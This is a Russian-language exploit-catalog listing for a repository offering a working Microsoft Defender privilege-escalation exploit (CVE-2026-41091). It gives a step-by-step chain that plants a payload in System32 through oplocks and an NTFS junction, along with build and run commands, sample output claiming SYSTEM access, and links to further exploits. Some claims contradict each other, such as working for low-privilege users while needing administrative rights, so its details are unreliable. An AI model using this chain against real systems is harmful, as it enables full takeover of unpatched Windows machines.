Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41091-PoC-Exploit — CVE-2026-41091 RedSun | Эксплойт LPE для Microsoft Defender. Пользователи с низкими привилегиями получают NT AUTHORITY\SYSTEM 🔥 через Cloud Files API и трюки с NTFS junction. Заставляет Defender записывать вредоносные полезные нагрузки в System32 с правами SYSTEM. ⚠️ Активно эксплуатируется в дикой природе. CVSS 7.8. Патч: Defender Engine 1.1.26040.8. 🛡️ Только образовательный PoC. | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-41091-poc-exploit
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubtc4dy/cve-2026-41091-poc-exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-41091-PoC-Exploit

Репозиторий
31 месяц назадЕщё не проверено

CVE-2026-41091 RedSun | Эксплойт LPE для Microsoft Defender. Пользователи с низкими привилегиями получают NT AUTHORITY\SYSTEM 🔥 через Cloud Files API и трюки с NTFS junction. Заставляет Defender записывать вредоносные полезные нагрузки в System32 с правами SYSTEM. ⚠️ Активно эксплуатируется в дикой природе. CVSS 7.8. Патч: Defender Engine 1.1.26040.8. 🛡️ Только образовательный PoC.

Поделиться

SolarFlare

☀️ CVE-2026-41091 - RedSun (SolarFlare) - LPE-эксплойт для Microsoft Defender

C++ Windows License CVSS CISA KEV

Уязвимость перехода по ссылкам (Link Following) в Microsoft Defender — локальное повышение привилегий до NT AUTHORITY\SYSTEM

Эта уязвимость известна как «RedSun» 🎯, а «SolarFlare» — имя, которое я дал своему эксплойту. ✅

📌 Обзор

Этот репозиторий содержит полностью рабочий Proof of Concept (PoC) эксплойт для CVE-2026-41091 — критической уязвимости локального повышения привилегий в Microsoft Defender (Microsoft Malware Protection Engine). Используя некорректное разрешение ссылок (CWE-59), аутентифицированный злоумышленник с низкими привилегиями может получить привилегии NT AUTHORITY\SYSTEM.

Эта уязвимость, также известная как «RedSun» или «SolarFlare», позволяет злоумышленникам обмануть Microsoft Defender, заставив его записывать произвольные файлы в защищённые системные расположения с привилегиями SYSTEM с помощью Cloud Files API (CfAPI) и точек соединения NTFS (junction points).

Примечание: этот репозиторий содержит две версии:

  • basic_poc.cpp — упрощённая демонстрация алгоритма (в образовательных целях)
  • full_poc.cpp — полностью рабочий эксплойт со всеми функциями

🔥 Ключевые возможности

🎯 Детали уязвимости

📦 Затронутые продукты

ПродуктЗатронутые версииИсправленные версии
Microsoft Malware Protection Engine< 1.1.26040.81.1.26040.8+
Microsoft Defender Antimalware Platform< 4.18.26040.74.18.26040.7+

🔬 Цепочка эксплойта

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOLARFLARE EXPLOIT CHAIN                                                    │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│ 1. Create Working Directory                                                 │
│    └─> %TEMP%\SF-XXXX\                                                      │
│                                                                              │
│ 2. Trigger Defender with EICAR                                              │
│    └─> Write reversed EICAR to bait file                                    │
│                                                                              │
│ 3. Wait for VSS Snapshot                                                    │
│    └─> Detect Volume Shadow Copy creation                                   │
│                                                                              │
│ 4. Create First Batch Oplock                                                │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK on bait file                              │
│                                                                              │
│ 5. Wait for Oplock Break                                                    │
│    └─> Acquire exclusive access                                             │
│                                                                              │
│ 6. Rename Directory                                                         │
│    └─> Move original directory to .tmp                                      │
│                                                                              │
│ 7. Register Cloud Sync Root                                                 │
│    └─> CfRegisterSyncRoot with Cloud Files API                              │
│                                                                              │
│ 8. Create Cloud Placeholder                                                 │
│    └─> CfCreatePlaceholders for bait file                                   │
│                                                                              │
│ 9. Create Second Batch Oplock                                               │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder                      │
│                                                                              │
│ 10. Wait for Second Oplock Break                                            │
│     └─> Acquire exclusive access                                            │
│                                                                              │
│ 11. Rename Cloud Directory                                                  │
│     └─> Move cloud directory to .cloud.tmp                                  │
│                                                                              │
│ 12. Create NTFS Junction to System32                                        │
│     └─> Redirect to C:\Windows\System32                                     │
│                                                                              │
│ 13. Copy Payload to System32                                                │
│     └─> Copy bait file to System32 as TieringEngineService.exe              │
│                                                                              │
│ 14. Activate Service as SYSTEM                                              │
│     └─> CoCreateInstance(StorageTiersManagement)                            │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

📦 Установка

Предварительные требования

  • Windows 10/11 или Windows Server 2019/2022
  • Visual Studio 2019/2022 с инструментами C++
  • Административные привилегии (для выполнения)

Сборка

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# Build using Visual Studio Developer Command Prompt
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Or build basic version
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

🛠️ Использование

Полный эксплойт (повышение привилегий до SYSTEM)

root@kitploit:~
full_poc.exe

Демонстрация базового алгоритма

root@kitploit:~
basic_poc.exe

📋 Пример вывода

Вывод полного эксплойта

root@kitploit:~
CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM

[+] SYSTEM access obtained!

Вывод базового PoC

root@kitploit:~
CVE-2026-41091 Basic PoC
========================================
  Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe

[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.

🔧 Инструкции по сборке

С использованием Visual Studio

  1. Откройте командную строку разработчика (Developer Command Prompt) для VS 2022
  2. Перейдите в каталог эксплойта
  3. Выполните:
root@kitploit:~
# Full exploit
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Basic PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

С использованием CMake

root@kitploit:~
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

⚠️ Требования и ограничения

🔗 Связанные эксплойты

Ознакомьтесь с другими моими репозиториями эксплойтов:

  • CVE-2026-24061-PoC-Exploit — обход аутентификации GNU inetutils-telnetd
  • CVE-2026-41940-PoC-Exploit — эксплойт обхода аутентификации cPanel/WHM
  • CVE-2026-0073-PoC-Exploit — обход аутентификации Android ADB Wireless Debugging
Скачать инструмент
КатегорияВозможности
Эксплуатация✅ Локальное повышение привилегий до SYSTEM
✅ Интеграция с Cloud Files API (CfAPI)
✅ Создание облачного заполнителя
✅ Перенаправление через NTFS junction
Техники✅ Злоупотребление batch-оплоками
✅ Обнаружение VSS-снимков
✅ Триггер EICAR
✅ Активация COM-сервиса
Цель✅ Microsoft Defender < 1.1.26040.8
✅ Windows 10/11
✅ Windows Server 2019/2022
Удобство использования✅ Детальное логирование
✅ Обработка ошибок
✅ Случайные имена каталогов
✅ Автоматическая очистка
АтрибутЗначение
CVE IDCVE-2026-41091
Оценка CVSS7.8 (Высокий)
Вектор CVSSAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Вектор атакиЛокальный
Требуемые привилегииНизкие
Взаимодействие с пользователемНе требуется
ВоздействиеВыполнение кода на уровне SYSTEM
CISA KEV✅ Да (активно эксплуатируется в дикой природе)
Доступно исправлениеMicrosoft Malware Protection Engine 1.1.26040.8
ТребованиеОписание
ОСWindows 10/11, Server 2019/2022
ПривилегииАдминистративные (для выполнения)
DefenderMicrosoft Defender должен быть включён
ИнтернетТребуется для обнаружения VSS-снимков
ПатчРаботает только на необновлённых системах
АрхитектураТолько x64